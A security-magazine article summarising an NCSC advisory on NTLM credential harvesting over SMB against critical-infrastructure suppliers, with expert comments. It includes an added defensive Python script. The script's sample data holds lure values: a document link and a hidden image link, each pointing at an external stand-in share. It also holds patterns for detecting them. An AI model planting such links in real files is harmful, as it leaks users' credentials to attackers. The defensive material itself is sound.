
Supply chain alert

by Mark Rowe

Hostile state actors – from unnamed countries – have been running an attack campaign against multiple companies in the CNI (critical national infrastructure) supply chain since at least March 2017, according to the UK's National Cyber Security Centre (NCSC). The targeting is focused on engineering and industrial control companies and has involved the harvesting of NTLM credentials over Server Message Block (SMB), using strategic web compromises (watering holes) and spear-phishing to make victims' Windows machines connect to attacker-controlled file servers.

For the document, visit the NCSC website.

According to the 20-page advisory, the attacker carries out a watering hole attack, compromising a website of interest to the target and adding a link to a resource on a malicious file server; a Windows client that follows the link attempts SMB authentication to that server and so hands over its NTLM credentials. Alternatively, the attacker sends a spear-phishing email from a compromised account (sometimes that of a known contact of the target) containing a document of interest. In several instances, stolen CVs have been used as the lure.
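The Python below is an added example, not code from the NCSC advisory or from this article. It shows the two checks a defender would run against the technique just described: scanning received content (a document's relationship part, a web page) for links that would make a Windows client open an SMB connection to a host outside the organisation, and scanning perimeter firewall records for outbound SMB that actually got through. The internal DNS suffix `corp.example.test`, the log line format and all sample data are assumptions made up for the example.

```python
"""Added example: find the link-to-external-SMB-share trick in received content,
and check whether the perimeter lets the resulting SMB connection out.

Assumptions (not from the NCSC advisory): the internal DNS suffix, the
firewall log line format and all sample data below are constructed.
"""
import ipaddress
import re
from urllib.parse import urlparse

# Hypothetical internal address space and DNS suffix for the organisation.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
INTERNAL_SUFFIXES = ("corp.example.test",)

# \\host\share\... (UNC path) and file://host/... or smb://host/... links.
# Windows resolves the host and, for SMB, authenticates with NTLM automatically.
UNC_RE = re.compile(r"""\\\\([A-Za-z0-9._-]+)\\[^\s"'<>]+""")
URL_RE = re.compile(r"""\b(?:file|smb)://[^\s"'<>]+""", re.IGNORECASE)
LOG_RE = re.compile(r"src=(\S+) dst=(\S+) proto=(\S+) dport=(\d+) action=(\S+)")


def is_internal(host):
    """True if host is an internal IP or an internal DNS name (single-label
    names are assumed to resolve inside the organisation)."""
    host = host.lower().rstrip(".")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        if "." not in host:
            return True
        return any(host == s or host.endswith("." + s) for s in INTERNAL_SUFFIXES)
    # Explicit list rather than ip.is_private: the latter also matches
    # documentation ranges such as 203.0.113.0/24, which we treat as external.
    return any(ip in net for net in INTERNAL_NETS)


def external_smb_targets(text):
    """Hosts outside the organisation that the content would make a Windows
    client open an SMB connection to (each one is a potential NTLM leak)."""
    hosts = set(m.group(1) for m in UNC_RE.finditer(text))
    for m in URL_RE.finditer(text):
        host = urlparse(m.group(0)).hostname
        if host:  # file:///C:/... has no host and stays local
            hosts.add(host)
    return sorted(h for h in hosts if not is_internal(h))


def outbound_smb_to_internet(lines):
    """(src, dst, action) for SMB connections from inside to outside hosts.
    An 'allow' hit means the perimeter does not block outbound SMB."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        src, dst, proto, dport, action = m.groups()
        if proto.lower() == "tcp" and int(dport) in (139, 445) \
                and is_internal(src) and not is_internal(dst):
            hits.append((src, dst, action))
    return hits


# Constructed samples. First: the relationships part of a .docx whose image is
# fetched from an attacker-controlled share when the document is opened.
SAMPLE_DOCX_RELS = r'''<Relationships>
<Relationship Id="rId1" Type=".../image" Target="media/image1.png"/>
<Relationship Id="rId2" Type=".../image" Target="\\203.0.113.10\share\logo.png" TargetMode="External"/>
<Relationship Id="rId3" Type=".../hyperlink" Target="http://www.example.test/" TargetMode="External"/>
</Relationships>'''

# Second: a page on a compromised (watering hole) site with an injected link.
SAMPLE_HTML = r'''<p>Download the tender pack: <a href="\\fs01\public\tender.pdf">internal copy</a></p>
<img src="file://files.example.net/s/pixel.png" width="1" height="1">'''

# Third: constructed perimeter firewall lines (format assumed).
SAMPLE_FW_LOG = [
    "2018-04-05T10:12:33Z src=10.1.2.3 dst=203.0.113.10 proto=tcp dport=445 action=allow",
    "2018-04-05T10:12:34Z src=10.1.2.3 dst=10.1.2.10 proto=tcp dport=445 action=allow",
    "2018-04-05T10:12:35Z src=10.1.2.7 dst=198.51.100.20 proto=tcp dport=443 action=allow",
    "2018-04-05T10:12:36Z src=10.1.2.9 dst=198.51.100.20 proto=tcp dport=139 action=deny",
]

if __name__ == "__main__":
    print("docx external SMB targets:", external_smb_targets(SAMPLE_DOCX_RELS))
    print("html external SMB targets:", external_smb_targets(SAMPLE_HTML))
    print("outbound SMB seen at perimeter:", outbound_smb_to_internet(SAMPLE_FW_LOG))
```

The first check is a triage aid for suspicious attachments and for pages on sites the organisation's staff use; the second is the one that matters most, because an "allow" on outbound TCP/445 or 139 to an internet address means the whole technique works against every Windows client behind that firewall, regardless of which lure is used.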

Once access has been gained to the network, the attacker pivots between machines using the harvested credentials together with penetration-testing and network-administration tools. In some cases the actors have also deployed custom malware. The attacker also uses cracked or stolen credentials to access the company's mail server and harvest the compromised user's contact list. The compromised mail server may then be used to send spear-phishing emails, apparently from the victim, to other targets.

Comments

Azeem Aleem, Director – Advanced Cyber Defence Practice EMEA at RSA Security, said: “Protecting our critical infrastructure is a matter of national security. However, cybersecurity is often more complex within these environments. Firstly, it is only in recent years that old manual systems have been ‘digitised’ and connected. For years prior the whole focus has been on physical security, which means these companies are often years behind those in banking and retail, per se.

“My advice would be to face these challenges head on and the only way to do this is by having visibility and context. This means conducting a thorough risk assessment, understanding the dependencies between systems, using threat detection to monitor and alert on attacks, and contextualising results with business context in order to prioritise events.

“Critical infrastructure companies are often dependent on legacy infrastructures with complex dependencies, and little visibility. They are unable to correlate security events to specific business outcomes – a problem we call the ‘Gap of Grief’. Take the recent wave of WannaCry and Petya attacks; the industry was quick to cry ‘patch’, but actually that isn’t always possible, as patching systems without proper testing could actually cause more damage.”

And Piers Wilson, Head of Product Management at a cyber security product company, Huntsman Security, said: “These attacks on national infrastructure should be utterly frightening given the chaos hackers can cause through sabotage and it’s made possible in part because of a lack of qualified security personnel and historic underinvestment. Within two years there will be over 1.5m security jobs unfilled globally, meaning that there simply aren’t enough resources in the UK to cope with the growing threats facing our critical infrastructure. Before the digital era, it was relatively simple to prevent and stop attacks, but now it’s much harder. There’s often no easy way to block all of these potential threats at the perimeter, and trying to do so will just result in security analysts becoming overwhelmed by the sheer volume of probes and false positives that mask real issues.

“Organisations must accept that traditional defences – firewalls, anti-virus etc. – are simply not enough and emphasis needs to shift away from just blocking attackers, to intelligent and rapid detection, containment and mitigation as soon as an attack begins. This means having first class, automated threat and security intelligence capabilities that can manage the deluge of potential problems – sorting real threats from the background noise of systems and network operation; freeing up security analysts to deal with the real problems as quickly and efficiently as possible. In the digital age, everyone – from the government and critical infrastructure organisations to businesses and charities – needs to accept that they can’t stop every attack at the boundary. Shifting focus will help to keep them and the rest of the UK safe.”


© 2024 Professional Security Magazine. All rights reserved.
